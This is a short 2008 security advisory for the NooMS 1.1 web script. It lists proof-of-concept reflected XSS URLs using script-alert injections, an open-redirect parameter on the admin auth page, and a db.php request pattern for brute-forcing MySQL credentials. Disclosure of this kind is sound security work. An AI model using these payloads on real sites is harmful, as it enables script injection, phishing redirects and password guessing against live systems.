NooMS Cross-Site Scripting Vulnerability :: 2008-09-16
---------------------------------------------------------------- Script : Nooms 1.1 Type : Multiple Vulnerabilities (Cross Site Scripting/Redirect/Mysql Brute Force Local Access) Risk : Medium ---------------------------------------------------------------- Download From : http://surfnet.dl.sourceforge.net/sourceforge/nooms/nooms_1.1.zip ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com ---------------------------------------------------------------- Mysql Remote Brute Force Vulnerability : This is new type of the vulnerabilities . I can't public Exploit of this vulnerability , But with this vulnerability attacker can brute force root and other user password with php in remote mode . Mysql Brute Force Vulnerability : /db.php?g_dbhost=localhost&g_dbuser=[username]&g_dbpwd=[password] ---------------------------------------------------------------- Cross Site Scripting Vulnerabilities : Xss 1 : http://Example/smileys.php?page_id=<script>alert('xss')</script> Xss 2 : http://Example/search.php?q="<script>alert('xss')</script> ---------------------------------------------------------------- Redirect Vulnerability : Xss 1 : http://Example/admin/auth.php?g_site_url=[URL] ---------------------------------------------------------------- Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR ----------------------------------------------------------------Download